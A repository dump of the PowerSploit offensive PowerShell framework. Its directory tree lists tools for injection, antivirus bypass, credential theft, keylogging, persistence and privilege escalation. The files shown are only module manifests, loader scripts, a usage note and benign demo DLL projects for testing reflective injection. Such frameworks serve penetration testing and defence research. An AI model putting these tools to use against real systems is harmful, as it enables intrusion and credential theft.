├── .gitignore
├── AntivirusBypass
├── AntivirusBypass.psd1
├── AntivirusBypass.psm1
├── Find-AVSignature.ps1
└── Usage.md
├── CodeExecution
├── CodeExecution.psd1
├── CodeExecution.psm1
├── Invoke-DllInjection.ps1
├── Invoke-ReflectivePEInjection.ps1
├── Invoke-ReflectivePEInjection_Resources
│ ├── DemoDLL
│ │ ├── DemoDLL.sln
│ │ └── DemoDLL
│ │ │ ├── DemoDLL.cpp
│ │ │ ├── DemoDLL.h
│ │ │ ├── DemoDLL.vcxproj
│ │ │ ├── DemoDLL.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── dllmain.cpp
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ ├── DemoDLL_RemoteProcess
│ │ ├── DemoDLL_RemoteProcess.sln
│ │ └── DemoDLL_RemoteProcess
│ │ │ ├── DemoDLL_RemoteProcess.cpp
│ │ │ ├── DemoDLL_RemoteProcess.vcxproj
│ │ │ ├── DemoDLL_RemoteProcess.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── dllmain.cpp
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ ├── DemoExe
│ │ ├── DemoExe.sln
│ │ ├── DemoExe_MD
│ │ │ ├── DemoExe_MD.cpp
│ │ │ ├── DemoExe_MD.vcxproj
│ │ │ ├── DemoExe_MD.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ │ └── DemoExe_MDd
│ │ │ ├── DemoExe_MDd.cpp
│ │ │ ├── DemoExe_MDd.vcxproj
│ │ │ ├── DemoExe_MDd.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ ├── ExeToInjectInTo
│ │ ├── ExeToInjectInTo.sln
│ │ └── ExeToInjectInTo
│ │ │ ├── ExeToInjectInTo.cpp
│ │ │ ├── ExeToInjectInTo.vcxproj
│ │ │ ├── ExeToInjectInTo.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ └── Shellcode
│ │ ├── readme.txt
│ │ ├── x64
│ │ ├── CallDllMain.asm
│ │ ├── ExitThread.asm
│ │ ├── GetFuncAddress.asm
│ │ └── LoadLibraryA.asm
│ │ └── x86
│ │ ├── CallDllMain.asm
│ │ ├── ExitThread.asm
│ │ └── GetProcAddress.asm
├── Invoke-Shellcode.ps1
├── Invoke-WmiCommand.ps1
└── Usage.md
├── Exfiltration
├── Exfiltration.psd1
├── Exfiltration.psm1
├── Get-GPPAutologon.ps1
├── Get-GPPPassword.ps1
├── Get-Keystrokes.ps1
├── Get-MicrophoneAudio.ps1
├── Get-TimedScreenshot.ps1
├── Get-VaultCredential.ps1
├── Get-VaultCredential.ps1xml
├── Invoke-CredentialInjection.ps1
├── Invoke-Mimikatz.ps1
├── Invoke-NinjaCopy.ps1
├── Invoke-TokenManipulation.ps1
├── LogonUser
│ └── LogonUser
│ │ ├── LogonUser.sln
│ │ ├── LogonUser
│ │ ├── LogonUser.cpp
│ │ ├── LogonUser.vcxproj
│ │ ├── LogonUser.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ │ └── logon
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── logon.cpp
│ │ ├── logon.vcxproj
│ │ ├── logon.vcxproj.filters
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── NTFSParser
│ ├── NTFSParser.sln
│ ├── NTFSParser
│ │ ├── NTFS.h
│ │ ├── NTFSParser.cpp
│ │ ├── NTFSParser.vcxproj
│ │ ├── NTFSParser.vcxproj.filters
│ │ ├── NTFS_Attribute.h
│ │ ├── NTFS_Common.h
│ │ ├── NTFS_DataType.h
│ │ ├── NTFS_FileRecord.h
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ └── NTFSParserDLL
│ │ ├── NTFS.h
│ │ ├── NTFSParserDLL.cpp
│ │ ├── NTFSParserDLL.vcxproj
│ │ ├── NTFSParserDLL.vcxproj.filters
│ │ ├── NTFS_Attribute.h
│ │ ├── NTFS_Common.h
│ │ ├── NTFS_DataType.h
│ │ ├── NTFS_FileRecord.h
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── Out-Minidump.ps1
├── Usage.md
└── VolumeShadowCopyTools.ps1
├── LICENSE
├── Mayhem
├── Mayhem.psd1
├── Mayhem.psm1
└── Usage.md
├── Persistence
├── Persistence.psd1
├── Persistence.psm1
└── Usage.md
├── PowerSploit.psd1
├── PowerSploit.psm1
├── PowerSploit.pssproj
├── PowerSploit.sln
├── Privesc
├── Get-System.ps1
├── PowerUp.ps1
├── Privesc.psd1
├── Privesc.psm1
└── README.md
├── README.md
├── Recon
├── Dictionaries
│ ├── admin.txt
│ ├── generic.txt
│ └── sharepoint.txt
├── Get-ComputerDetail.ps1
├── Get-HttpStatus.ps1
├── Invoke-CompareAttributesForClass.ps1
├── Invoke-Portscan.ps1
├── Invoke-ReverseDnsLookup.ps1
├── PowerView.ps1
├── README.md
├── Recon.psd1
└── Recon.psm1
├── ScriptModification
├── Out-CompressedDll.ps1
├── Out-EncodedCommand.ps1
├── Out-EncryptedScript.ps1
├── Remove-Comment.ps1
├── ScriptModification.psd1
├── ScriptModification.psm1
└── Usage.md
├── Tests
├── CodeExecution.tests.ps1
├── Exfiltration.tests.ps1
├── PowerSploit.tests.ps1
├── Privesc.tests.ps1
└── Recon.tests.ps1
├── docs
├── AntivirusBypass
│ └── Find-AVSignature.md
├── CodeExecution
│ ├── Invoke-DllInjection.md
│ ├── Invoke-ReflectivePEInjection.md
│ ├── Invoke-Shellcode.md
│ └── Invoke-WmiCommand.md
├── Mayhem
│ ├── Set-CriticalProcess.md
│ └── Set-MasterBootRecord.md
├── Persistence
│ ├── Add-Persistence.md
│ ├── Get-SecurityPackage.md
│ ├── Install-SSP.md
│ ├── New-ElevatedPersistenceOption.md
│ └── New-UserPersistenceOption.md
├── Privesc
│ ├── Add-ServiceDacl.md
│ ├── Enable-Privilege.md
│ ├── Find-PathDLLHijack.md
│ ├── Find-ProcessDLLHijack.md
│ ├── Get-ApplicationHost.md
│ ├── Get-CachedGPPPassword.md
│ ├── Get-ModifiablePath.md
│ ├── Get-ModifiableRegistryAutoRun.md
│ ├── Get-ModifiableScheduledTaskFile.md
│ ├── Get-ModifiableService.md
│ ├── Get-ModifiableServiceFile.md
│ ├── Get-ProcessTokenGroup.md
│ ├── Get-ProcessTokenPrivilege.md
│ ├── Get-RegistryAlwaysInstallElevated.md
│ ├── Get-RegistryAutoLogon.md
│ ├── Get-ServiceDetail.md
│ ├── Get-SiteListPassword.md
│ ├── Get-System.md
│ ├── Get-UnattendedInstallFile.md
│ ├── Get-UnquotedService.md
│ ├── Get-WebConfig.md
│ ├── Install-ServiceBinary.md
│ ├── Invoke-PrivescAudit.md
│ ├── Invoke-ServiceAbuse.md
│ ├── Invoke-WScriptUACBypass.md
│ ├── Restore-ServiceBinary.md
│ ├── Set-ServiceBinaryPath.md
│ ├── Test-ServiceDaclPermission.md
│ ├── Write-HijackDll.md
│ ├── Write-ServiceBinary.md
│ ├── Write-UserAddMSI.md
│ └── index.md
├── Recon
│ ├── Add-DomainGroupMember.md
│ ├── Add-DomainObjectAcl.md
│ ├── Add-RemoteConnection.md
│ ├── Convert-ADName.md
│ ├── ConvertFrom-SID.md
│ ├── ConvertFrom-UACValue.md
│ ├── ConvertTo-SID.md
│ ├── Export-PowerViewCSV.md
│ ├── Find-DomainLocalGroupMember.md
│ ├── Find-DomainObjectPropertyOutlier.md
│ ├── Find-DomainProcess.md
│ ├── Find-DomainShare.md
│ ├── Find-DomainUserEvent.md
│ ├── Find-DomainUserLocation.md
│ ├── Find-InterestingDomainAcl.md
│ ├── Find-InterestingDomainShareFile.md
│ ├── Find-InterestingFile.md
│ ├── Find-LocalAdminAccess.md
│ ├── Get-ComputerDetail.md
│ ├── Get-Domain.md
│ ├── Get-DomainComputer.md
│ ├── Get-DomainController.md
│ ├── Get-DomainDFSShare.md
│ ├── Get-DomainDNSRecord.md
│ ├── Get-DomainDNSZone.md
│ ├── Get-DomainFileServer.md
│ ├── Get-DomainForeignGroupMember.md
│ ├── Get-DomainForeignUser.md
│ ├── Get-DomainGPO.md
│ ├── Get-DomainGPOComputerLocalGroupMapping.md
│ ├── Get-DomainGPOLocalGroup.md
│ ├── Get-DomainGPOUserLocalGroupMapping.md
│ ├── Get-DomainGroup.md
│ ├── Get-DomainGroupMember.md
│ ├── Get-DomainManagedSecurityGroup.md
│ ├── Get-DomainOU.md
│ ├── Get-DomainObject.md
│ ├── Get-DomainObjectAcl.md
│ ├── Get-DomainPolicy.md
│ ├── Get-DomainSID.md
│ ├── Get-DomainSPNTicket.md
│ ├── Get-DomainSite.md
│ ├── Get-DomainSubnet.md
│ ├── Get-DomainTrust.md
│ ├── Get-DomainTrustMapping.md
│ ├── Get-DomainUser.md
│ ├── Get-DomainUserEvent.md
│ ├── Get-Forest.md
│ ├── Get-ForestDomain.md
│ ├── Get-ForestGlobalCatalog.md
│ ├── Get-ForestTrust.md
│ ├── Get-HttpStatus.md
│ ├── Get-NetComputerSiteName.md
│ ├── Get-NetLocalGroup.md
│ ├── Get-NetLocalGroupMember.md
│ ├── Get-NetLoggedon.md
│ ├── Get-NetRDPSession.md
│ ├── Get-NetSession.md
│ ├── Get-NetShare.md
│ ├── Get-PathAcl.md
│ ├── Get-RegLoggedOn.md
│ ├── Get-WMIProcess.md
│ ├── Get-WMIRegCachedRDPConnection.md
│ ├── Get-WMIRegLastLoggedOn.md
│ ├── Get-WMIRegMountedDrive.md
│ ├── Get-WMIRegProxy.md
│ ├── Invoke-Kerberoast.md
│ ├── Invoke-Portscan.md
│ ├── Invoke-ReverseDnsLookup.md
│ ├── Invoke-RevertToSelf.md
│ ├── Invoke-UserImpersonation.md
│ ├── New-DomainGroup.md
│ ├── New-DomainUser.md
│ ├── Remove-RemoteConnection.md
│ ├── Resolve-IPAddress.md
│ ├── Set-DomainObject.md
│ ├── Set-DomainObjectOwner.md
│ ├── Set-DomainUserPassword.md
│ ├── Test-AdminAccess.md
│ └── index.md
├── ScriptModification
│ ├── Out-CompressedDll.md
│ ├── Out-EncodedCommand.md
│ ├── Out-EncryptedScript.md
│ └── Remove-Comment.md
└── index.md
└── mkdocs.yml
/AntivirusBypass/AntivirusBypass.psd1:
--------------------------------------------------------------------------------
@{

# Script module or binary module file associated with this manifest.
# NOTE(review): ModuleToProcess is the pre-PowerShell-3.0 spelling of RootModule;
# it is kept here because PowerShellVersion below is '2.0'.
ModuleToProcess = 'AntivirusBypass.psm1'

# Version number of this module.
ModuleVersion = '3.0.0.0'

# ID used to uniquely identify this module
GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'

# Author of this module
Author = 'Matthew Graeber'

# Copyright statement for this module
# NOTE(review): this field carries the licence name rather than a copyright line;
# the full licence text is the LICENSE file at the repository root.
Copyright = 'BSD 3-Clause'

# Description of the functionality provided by this module
Description = 'PowerSploit Antivirus Avoidance/Bypass Module'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'

# Functions to export from this module
# '*' exports every function defined by the scripts the .psm1 dot-sources,
# helpers included; an explicit name list would keep the public surface deliberate.
FunctionsToExport = '*'

# List of all files packaged with this module
FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md'

}
31 |
--------------------------------------------------------------------------------
/AntivirusBypass/AntivirusBypass.psm1:
--------------------------------------------------------------------------------
# Dot-source every .ps1 that sits beside this module file so each script's
# functions are defined in the module scope. Whatever .ps1 files are present
# in the module folder are loaded, so the folder's contents define the module.
foreach ($script in Get-ChildItem -Path (Join-Path $PSScriptRoot '*.ps1')) {
    . $script.FullName
}
2 |
--------------------------------------------------------------------------------
/AntivirusBypass/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire AntivirusBypass folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module AntivirusBypass`
7 |
8 | To see the commands imported, type `Get-Command -Module AntivirusBypass`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Packaging them as a module simply makes them more portable.
--------------------------------------------------------------------------------
/CodeExecution/CodeExecution.psd1:
--------------------------------------------------------------------------------
@{

# Script module or binary module file associated with this manifest.
# NOTE(review): ModuleToProcess is the pre-PowerShell-3.0 spelling of RootModule;
# it is kept here because PowerShellVersion below is '2.0'.
ModuleToProcess = 'CodeExecution.psm1'

# Version number of this module.
ModuleVersion = '3.0.0.0'

# ID used to uniquely identify this module
GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'

# Author of this module
Author = 'Matthew Graeber'

# Company or vendor of this module
CompanyName = ''

# Copyright statement for this module
# NOTE(review): this field carries the licence name rather than a copyright line;
# the full licence text is the LICENSE file at the repository root.
Copyright = 'BSD 3-Clause'

# Description of the functionality provided by this module
Description = 'PowerSploit Code Execution Module'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'

# Functions to export from this module
# '*' exports every function defined by the scripts the .psm1 dot-sources,
# helpers included; an explicit name list would keep the public surface deliberate.
FunctionsToExport = '*'

# List of all files packaged with this module
# The trailing comma continues the array onto the next line.
FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1',
'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md'
}
34 |
--------------------------------------------------------------------------------
/CodeExecution/CodeExecution.psm1:
--------------------------------------------------------------------------------
# Dot-source every .ps1 that sits beside this module file so each script's
# functions are defined in the module scope. Whatever .ps1 files are present
# in the module folder are loaded, so the folder's contents define the module.
foreach ($script in Get-ChildItem -Path (Join-Path $PSScriptRoot '*.ps1')) {
    . $script.FullName
}
2 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL", "DemoDLL\DemoDLL.vcxproj", "{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32
16 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64
17 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64
18 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32
19 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32
20 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64
21 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "DemoDLL.h"
6 |
7 | using namespace std;
8 |
9 |
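// Builds the demo message in a string stream and hands back a heap copy.
//
// Returns: a NUL-terminated buffer allocated with new[]; nothing in this DLL
//          releases it, so the caller owns it (delete[], not free()).
//
// The original allocated the ostringstream with new and never deleted it; an
// automatic object closes that leak without changing the exported contract.
extern "C" __declspec( dllexport ) char* StringFunc()
{
    std::ostringstream stringStream;

    // To write to cout instead, point outputStream at &cout. Keeping the
    // generic ostream* lets the same code target a string or the console.
    std::ostream *outputStream = &stringStream;
    //outputStream = &std::cout;

    (*outputStream) << "String DLL function is working" << std::endl << std::endl;

    const std::string output = stringStream.str();

    // size()+1 covers the terminator, which c_str() guarantees is present,
    // so the whole buffer is initialised by the single copy.
    char* out = new char[output.size() + 1];
    std::memcpy(out, output.c_str(), output.size() + 1);

    return out;
}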
32 |
// Exported no-op used to prove the DLL's void export can be reached. Its only
// effect is one fixed line on stdout, which is visible only when the DLL runs
// in a process that has a console.
extern "C" __declspec( dllexport ) void VoidFunc()
{
    static const char kMessage[] =
        "Void DLL function is working, using printf to display. You will only see this if you run locally.\n\n";
    std::fputs(kMessage, stdout);
}
38 |
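// Wide-character twin of StringFunc: builds the demo message in a wide string
// stream and hands back a heap copy.
//
// Returns: a NUL-terminated wchar_t buffer allocated with new[]; nothing in
//          this DLL releases it, so the caller owns it (delete[], not free()).
//
// Fixes relative to the original: the wostringstream was allocated with new
// and never deleted (leak); outputStream was first set to &wcout and then
// immediately overwritten (dead store); the comment said &cout where the
// wide stream is &wcout.
extern "C" __declspec( dllexport ) wchar_t* WStringFunc()
{
    std::wostringstream stringStream;

    // To write to wcout instead, point outputStream at &wcout. Keeping the
    // generic wostream* lets the same code target a wstring or the console.
    std::wostream *outputStream = &stringStream;
    //outputStream = &std::wcout;

    (*outputStream) << L"WString DLL function is working" << std::endl << std::endl;

    const std::wstring output = stringStream.str();

    // size()+1 covers the terminator, which c_str() guarantees is present.
    wchar_t* out = new wchar_t[output.size() + 1];
    std::wmemcpy(out, output.c_str(), output.size() + 1);

    return out;
}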
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h:
--------------------------------------------------------------------------------
1 | // The following ifdef block is the standard way of creating macros which make exporting
2 | // from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS
3 | // symbol defined on the command line. This symbol should not be defined on any project
4 | // that uses this DLL. This way any other project whose source files include this file see
5 | // DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols
6 | // defined with this macro as being exported.
#ifdef DEMODLL_EXPORTS
#define DEMODLL_API __declspec(dllexport)
#else
#define DEMODLL_API __declspec(dllimport)
#endif

// NOTE(review): DEMODLL_API is defined above but not used by the declarations
// below, which spell out __declspec(dllexport) directly; a consumer that
// includes this header therefore sees export rather than import linkage.
using namespace std;  // in a header this leaks std into every includer; tolerable for a demo

// C linkage keeps the exported names unmangled so they can be resolved by name.
extern "C" __declspec( dllexport ) char* StringFunc();
extern "C" __declspec( dllexport ) void VoidFunc();
extern "C" __declspec( dllexport ) wchar_t* WStringFunc();
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL application.
9 |
10 |
11 | DemoDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoDLL.cpp
25 | This is the main DLL source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoDLL.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
// DLL entry point. The demo has nothing to set up or tear down, so every
// reason code (process/thread attach and detach) is accepted without action.
//
// Params: hModule            - this DLL's module handle (unused)
//         ul_reason_for_call - DLL_PROCESS_ATTACH / DLL_THREAD_ATTACH /
//                              DLL_THREAD_DETACH / DLL_PROCESS_DETACH (unused)
//         lpReserved         - loader-reserved pointer (unused)
// Returns: TRUE, so the load is never refused.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)ul_reason_for_call;
    (void)lpReserved;
    return TRUE;
}
19 |
20 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32
16 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64
17 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64
18 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32
19 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32
20 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64
21 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
6 | using namespace std;
7 |
8 | extern "C" __declspec( dllexport ) void VoidFunc();
9 |
10 |
// Exported demo function for the remote-process test. It has no console to
// print to, so it records that it ran by dropping a marker file on a fixed path.
//
// Side effects: creates c:\ReflectiveLoaderTest (the _mkdir result is ignored,
//               as in the original, so an existing directory is fine) and
//               writes DllVoidFunction.txt inside it. Open failures are silent.
extern "C" __declspec( dllexport ) void VoidFunc()
{
    _mkdir("c:\\ReflectiveLoaderTest");

    // The ofstream constructor opens the file and its destructor closes it.
    std::ofstream marker("c:\\ReflectiveLoaderTest\\DllVoidFunction.txt");
    marker << "Dll Void function successfully called.\n";
}
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL_RemoteProcess Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL_RemoteProcess DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL_RemoteProcess application.
9 |
10 |
11 | DemoDLL_RemoteProcess.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL_RemoteProcess.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoDLL_RemoteProcess.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
